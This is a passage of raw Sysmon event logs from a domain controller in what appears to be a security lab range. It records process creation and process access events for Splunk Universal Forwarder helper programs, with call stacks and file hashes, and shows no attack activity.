Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031394Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.747{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031393Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.747{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031392Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.747{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031391Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.747{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031390Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.747{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-56D2-6008-1A07-00000000A301}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031389Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.747{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-56D2-6008-1A07-00000000A301}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031388Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.749{7901BC46-56D2-6008-1A07-00000000A301}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031387Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.216{7901BC46-56D2-6008-1907-00000000A301}45164828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031386Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.075{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-56D2-6008-1907-00000000A301}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031385Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.075{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031384Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.075{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031383Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.075{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031382Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.075{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031381Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.075{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-56D2-6008-1907-00000000A301}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031380Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.075{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-56D2-6008-1907-00000000A301}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031379Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:10.076{7901BC46-56D2-6008-1907-00000000A301}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031404Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:11.419{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-56D3-6008-1B07-00000000A301}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031403Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:11.419{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031402Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:11.419{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031401Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:11.419{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031400Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:11.419{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031399Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:11.419{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-56D3-6008-1B07-00000000A301}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000031398Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:11.419{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-56D3-6008-1B07-00000000A301}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000031397Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:14:11.420{7901BC46-56D3-6008-1B07-00000000A301}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000031420Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.980{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-570B-6008-1D07-00000000A301}1784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031419Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.980{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031418Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:15:07.980{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031417Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 